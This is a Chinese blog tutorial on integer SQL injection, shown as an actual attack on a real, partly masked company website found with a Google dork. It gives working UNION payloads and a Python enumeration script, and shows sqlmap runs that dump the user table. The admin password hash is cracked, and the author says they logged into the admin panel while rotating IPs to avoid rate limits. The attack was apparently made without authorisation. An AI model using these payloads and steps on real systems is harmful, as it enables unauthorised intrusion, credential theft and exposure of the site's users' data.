Eclipse facebook class loam算法测试 jScrollPane vue案例 vue安装教程 bootstrap后台管理 java商城源码 jq点击事件 matlab向量的模 arraylist删除指定元素 websocket库 mysql查询结果拼接 dwf文件怎么转成dwg python正则表达式 河南普通话报名入口 pythonapi python中的for循环 python中for循环的用法 java的数据类型 java初学者 java的环境配置 java多线程编程 java集合类型 javascript基础 asp建站系统 内存整理软件 0x0000004e 电脑必备软件排行榜 js获取父节点 raid0教程 海妖花粉哪里多 如何给黑白照片上色 中维高清监控系统安装 dnf选择角色卡死 卧龙推广 淘新闻下载 su镜像 惠普打印机怎么加粉
当前位置: 首页 > 学习教程  > 编程语言

SQL注入-整型注入实例

2020/9/19 14:05:57 文章标签:

发现存在SQL注入的站点有很多都是PHP,估计是PHP的占有率太大了,而且建站方便效率高,这就和ios和安卓一样,始终认为安卓安全性差,win和linux,mac一样,始终认为win的安全性差,毕竟占有率摆在这里

通过谷歌来搜索一些存在注入漏洞的网站,用谷歌hack语法来搜索:公司inurl:".php?id="
结尾为公司,url中带有.php?id=的网页 那么我们来搜索下,我们就选择第一个

在这里插入图片描述

先加一个’测试一下,网页直接报错,从报错信息来看,是一个linux服务器,mysql的数据库
在这里插入图片描述

使用hackbar插件继续测试,不报错 继续测试,报错,说明这个字段是一个整型数据
在这里插入图片描述

?id=37 and '1'='1'

为什么说是整型数据呢? 因为假设它是字符型的数据,那么sql语句结尾必定是’符号,那么此时语句应该是这样的,那么报错

select * from 表 where id='37 and '1'='1''

若是整型数据,就是这样子的,那么不会报错,所以这个字段是整型的

select * from 表 where id=37 and '1'='1'

那么这是存在整型的注入点,继续测试

使用order by语句排序来判断当前表的字段数,总共25不报错,26报错,当前表为25个字段
在这里插入图片描述

使用union联合查询,判断信息输出位置,输出的是2和10

and 1=2 每次都需要加是因为需要将前面的sql语句为假,那么则执行后面的sql语句

?id=37 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25

在这里插入图片描述

替换2,和10的位置为database(),和user(),页面输出数据库名称和账号名和地址信息,database为bdm266490221_db

在这里插入图片描述

此时我们就可以使用mysql自带的information_schema库来查询信息了

?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA='bdm266490221_db' limit 0,1

在这里插入图片描述

发现报错了,很可能屏蔽了’号,那么我们可以将其转化成十六进制数
在这里插入图片描述

再来!

?id=37 and 1=2 union select 1,TABLE_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES where TABLE_SCHEMA=0x2762646d3236363439303232315f646227 limit 0,1

依旧没有显示出来,这个地方有两点值得注意

1.可能不支持’"等符号,那么使用0x 十六进制的方法

2.可能sql语句后接了一些其他的语句,那么使用 – 来注释那些语句,这样就可以使用limit 0,1输出指定信息

现在这样子就是没法使用where精确的查找出bdm266490221_db库的所有表名了,那么我换一种方法,直接用脚本列举出所有的表名和对应的db库

使用python构造所有url,请求然后正则匹配需要的信息

and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit 0,1
for i in range(0,1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,TABLE_SCHEMA,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.TABLES limit %d,%d"""%(i,i+1)
        rsp = requests.get(url=url).text
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)',rsp)
        print(info,i)
    except:
        print('error:%d'%i)
[('information_schema', ''), ('', 'CHARACTER_SETS')] 0
[('information_schema', ''), ('', 'COLLATIONS')] 1
[('information_schema', ''), ('', 'COLLATION_CHARACTER_SET_APPLICABILITY')] 2
[('information_schema', ''), ('', 'COLUMNS')] 3
[('information_schema', ''), ('', 'COLUMN_PRIVILEGES')] 4
[('information_schema', ''), ('', 'ENGINES')] 5
[('information_schema', ''), ('', 'EVENTS')] 6
[('information_schema', ''), ('', 'FILES')] 7
[('information_schema', ''), ('', 'GLOBAL_STATUS')] 8
[('information_schema', ''), ('', 'GLOBAL_VARIABLES')] 9
[('information_schema', ''), ('', 'KEY_COLUMN_USAGE')] 10
[('information_schema', ''), ('', 'PARTITIONS')] 11
[('information_schema', ''), ('', 'PLUGINS')] 12
[('information_schema', ''), ('', 'PROCESSLIST')] 13
[('information_schema', ''), ('', 'PROFILING')] 14
[('information_schema', ''), ('', 'REFERENTIAL_CONSTRAINTS')] 15
[('information_schema', ''), ('', 'ROUTINES')] 16
[('information_schema', ''), ('', 'SCHEMATA')] 17
[('information_schema', ''), ('', 'SCHEMA_PRIVILEGES')] 18
[('information_schema', ''), ('', 'SESSION_STATUS')] 19
[('information_schema', ''), ('', 'SESSION_VARIABLES')] 20
[('information_schema', ''), ('', 'STATISTICS')] 21
[('information_schema', ''), ('', 'TABLES')] 22
[('information_schema', ''), ('', 'TABLE_CONSTRAINTS')] 23
[('information_schema', ''), ('', 'TABLE_PRIVILEGES')] 24
[('information_schema', ''), ('', 'TRIGGERS')] 25
[('information_schema', ''), ('', 'USER_PRIVILEGES')] 26
[('information_schema', ''), ('', 'VIEWS')] 27
[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36
[('', ''), ('', '')] 37
[('', ''), ('', '')] 38

可以看到bdm266490221_db存在的表,user这个可能是存放用户的账号密码的表,那么再查询下它的字段,依旧使用脚本列举

[('bdm266490221_db', ''), ('', 'gplat_book')] 28
[('bdm266490221_db', ''), ('', 'gplat_news')] 29
[('bdm266490221_db', ''), ('', 'gplat_newsclass')] 30
[('bdm266490221_db', ''), ('', 'gplat_newsclass2')] 31
[('bdm266490221_db', ''), ('', 'href')] 32
[('bdm266490221_db', ''), ('', 'job')] 33
[('bdm266490221_db', ''), ('', 'job_add')] 34
[('bdm266490221_db', ''), ('', 'lawyer_wenda')] 35
[('bdm266490221_db', ''), ('', 'user')] 36

继续列举表字段,直接查询字段名

and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit 0,1
for i in range(0,1000):
    try:
        url = """http://www.***.com/about.php?id=37 and 1=2 union select 1,COLUMN_NAME,3,4,5,6,7,8,9,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.COLUMNS limit %d,%d"""%(i,i+1)
        rsp = requests.get(url=url).text
        info = re.findall(r'(?:page_bt">)(.*)(?:<)|(?:page_text">)(.*)(?:<)',rsp)
        print(info,i)
    except:
        print('error:%d'%i)
[('id', ''), ('', 'gplat_book')] 315
[('ip', ''), ('', 'gplat_book')] 316
[('title', ''), ('', 'gplat_book')] 317
[('content', ''), ('', 'gplat_book')] 318
[('times', ''), ('', 'gplat_book')] 319
[('stick', ''), ('', 'gplat_book')] 320
[('class', ''), ('', 'gplat_book')] 321
[('name', ''), ('', 'gplat_book')] 322
[('up_time', ''), ('', 'gplat_book')] 323
[('view', ''), ('', 'gplat_book')] 324
[('photo', ''), ('', 'gplat_book')] 325
[('email', ''), ('', 'gplat_book')] 326
[('userid', ''), ('', 'gplat_book')] 327
[('fid', ''), ('', 'gplat_book')] 328
[('id', ''), ('', 'gplat_news')] 329
[('title', ''), ('', 'gplat_news')] 330
[('path', ''), ('', 'gplat_news')] 331
[('class', ''), ('', 'gplat_news')] 332
[('sticky', ''), ('', 'gplat_news')] 333
[('times', ''), ('', 'gplat_news')] 334
[('clickNum', ''), ('', 'gplat_news')] 335
[('author', ''), ('', 'gplat_news')] 336
[('cchu', ''), ('', 'gplat_news')] 337
[('content', ''), ('', 'gplat_news')] 338
[('introduce', ''), ('', 'gplat_news')] 339
[('img', ''), ('', 'gplat_news')] 340
[('TitleFontColor', ''), ('', 'gplat_news')] 341
[('TitleFontType', ''), ('', 'gplat_news')] 342
[('issystem', ''), ('', 'gplat_news')] 343
[('classIndex', ''), ('', 'gplat_news')] 344
[('bigimg', ''), ('', 'gplat_news')] 345
[('views', ''), ('', 'gplat_news')] 346
[('url', ''), ('', 'gplat_news')] 347
[('files', ''), ('', 'gplat_news')] 348
[('seo_title', ''), ('', 'gplat_news')] 349
[('seo_description', ''), ('', 'gplat_news')] 350
[('seo_keywords', ''), ('', 'gplat_news')] 351
[('sort', ''), ('', 'gplat_news')] 352
[('indexview', ''), ('', 'gplat_news')] 353
[('id', ''), ('', 'gplat_newsclass')] 354
[('name', ''), ('', 'gplat_newsclass')] 355
[('href', ''), ('', 'gplat_newsclass')] 356
[('classIndex', ''), ('', 'gplat_newsclass')] 357
[('issystem', ''), ('', 'gplat_newsclass')] 358
[('id', ''), ('', 'gplat_newsclass2')] 359
[('fid', ''), ('', 'gplat_newsclass2')] 360
[('name', ''), ('', 'gplat_newsclass2')] 361
[('num', ''), ('', 'gplat_newsclass2')] 362
[('classIndex', ''), ('', 'gplat_newsclass2')] 363
[('issystem', ''), ('', 'gplat_newsclass2')] 364
[('id', ''), ('', 'href')] 365
[('title', ''), ('', 'href')] 366
[('href', ''), ('', 'href')] 367
[('img', ''), ('', 'href')] 368
[('href_img', ''), ('', 'href')] 369
[('href_order', ''), ('', 'href')] 370
[('id', ''), ('', 'job')] 371
[('ip', ''), ('', 'job')] 372
[('title', ''), ('', 'job')] 373
[('content', ''), ('', 'job')] 374
[('times', ''), ('', 'job')] 375
[('stick', ''), ('', 'job')] 376
[('class_id', ''), ('', 'job')] 377
[('name', ''), ('', 'job')] 378
[('up_time', ''), ('', 'job')] 379
[('view', ''), ('', 'job')] 380
[('photo', ''), ('', 'job')] 381
[('email', ''), ('', 'job')] 382
[('id', ''), ('', 'job_add')] 383
[('ip', ''), ('', 'job_add')] 384
[('title', ''), ('', 'job_add')] 385
[('content', ''), ('', 'job_add')] 386
[('times', ''), ('', 'job_add')] 387
[('stick', ''), ('', 'job_add')] 388
[('class_id', ''), ('', 'job_add')] 389
[('name', ''), ('', 'job_add')] 390
[('up_time', ''), ('', 'job_add')] 391
[('view', ''), ('', 'job_add')] 392
[('telephone', ''), ('', 'job_add')] 393
[('email', ''), ('', 'job_add')] 394
[('sex', ''), ('', 'job_add')] 395
[('birthday', ''), ('', 'job_add')] 396
[('marry', ''), ('', 'job_add')] 397
[('school', ''), ('', 'job_add')] 398
[('studydegree', ''), ('', 'job_add')] 399
[('specialty', ''), ('', 'job_add')] 400
[('gradyear', ''), ('', 'job_add')] 401
[('address', ''), ('', 'job_add')] 402
[('resumes', ''), ('', 'job_add')] 403
[('id', ''), ('', 'lawyer_wenda')] 404
[('ip', ''), ('', 'lawyer_wenda')] 405
[('title', ''), ('', 'lawyer_wenda')] 406
[('content', ''), ('', 'lawyer_wenda')] 407
[('times', ''), ('', 'lawyer_wenda')] 408
[('stick', ''), ('', 'lawyer_wenda')] 409
[('class_id', ''), ('', 'lawyer_wenda')] 410
[('name', ''), ('', 'lawyer_wenda')] 411
[('up_time', ''), ('', 'lawyer_wenda')] 412
[('view', ''), ('', 'lawyer_wenda')] 413
[('photo', ''), ('', 'lawyer_wenda')] 414
[('email', ''), ('', 'lawyer_wenda')] 415
[('company', ''), ('', 'lawyer_wenda')] 416
[('address', ''), ('', 'lawyer_wenda')] 417
[('answer', ''), ('', 'lawyer_wenda')] 418
[('id', ''), ('', 'user')] 419
[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
[('email', ''), ('', 'user')] 422
[('phone', ''), ('', 'user')] 423
[('times', ''), ('', 'user')] 424
[('up_time', ''), ('', 'user')] 425
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200919134902878.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1Rlc3RvbmVvbmV6,size_16,color_FFFFFF,t_70#pic_center)
[('xingb', ''), ('', 'user')] 426
[('adder', ''), ('', 'user')] 427
[('qianming', ''), ('', 'user')] 428
[('image', ''), ('', 'user')] 429
[('grade', ''), ('', 'user')] 430
[('admin', ''), ('', 'user')] 431

可以看到name,和pass很可能是账号密码,那么再使用页面构造sql来注入

[('name', ''), ('', 'user')] 420
[('pass', ''), ('', 'user')] 421
?id=37 and 1=2 union select 1,name,3,4,5,6,7,8,9,pass,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from bdm266490221_db.user

页面则输出信息admin和一串加密的密码,这串密码不知道什么加密的,之后用sqlmap自动破解了,密码为123321,所以这个应该是存在一个后台管理页面的账号为admin,密码为123321

在这里插入图片描述

既然有账号密码,那么应该是由一个管理地址,使用nikto -h url来扫描一下信息,看能不能出点什么信息

root@MiWiFi-R3L-srv:~# nikto -h http://www.***.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          60.205.33.**
+ Target Hostname:    www.***.com
+ Target Port:        80
+ Start Time:         2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 12 item(s) reported on remote host
+ End Time:           2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

扫出来了可能是后台地址的路径,尝试了一下是管理地址,使用账号密码进入后就是想办法拿到webshell了,还是不能随便去搞破坏,怪不得别人说渗透学的好,牢房蹲到老

在这里插入图片描述

这个网站对同一个公网ip的多次访问做了限制,一段时间会无法访问,所以我测试就不停的更换ip…

关注“码点小干货”公众号,一起分享一起交流各类信息技术和工具资源

愿你眼中总有光芒! - 愿你活成想要的样子!

公众号回复hackbar获取谷歌插件,方便sql注入的测试,不然使用网页URL栏的输入非常麻烦,因为每次符号都会被转码,嘿嘿

在这里插入图片描述

之后使用sqlmap做了一次扫描结果一致

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://mt.com/about.php?id=37 --dbs --delay 0.5
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:10:16 /2019-05-28/

[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema

[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:10:17 /2019-05-28/

于是爆出了两个数据库名
available databases [2]:
[*] bdm266490221_db
[*] information_schema

2.再尝试爆表名,当我们知道了数据库名,那么直接指定数据库名
python sqlmap.py -u http://www.**.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.5.142#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:12:48 /2019-05-28/

[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user             |
| gplat_book       |
| gplat_news       |
| gplat_newsclass  |
| gplat_newsclass2 |
| href             |
| job              |
| job_add          |
| lawyer_wenda     |
+------------------+

[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y***.com'

[*] ending @ 16:12:49 /2019-05-28/
爆出了9个表名,那么看名字应该就是user表了

3.爆字段
python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:39 /2019-05-28/

[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| adder    | varchar(8)   |
| admin    | int(2)       |
| email    | varchar(60)  |
| grade    | varchar(12)  |
| id       | int(6)       |
| image    | varchar(70)  |
| name     | varchar(60)  |
| pass     | varchar(60)  |
| phone    | varchar(14)  |
| qianming | varchar(100) |
| times    | datetime     |
| up_time  | datetime     |
| xingb    | varchar(2)   |
+----------+--------------+

[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.y**mt.com'

[*] ending @ 16:15:40 /2019-05-28/

4.爆内容,看起来user和pass像是账号密码
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.***.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:18:43 /2019-05-28/

[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user    | pass                                              |
+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+

[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.****.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.***.com'

[*] ending @ 16:22:45 /2019-05-28/

本文链接: http://www.dtmao.cc/news_show_200082.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?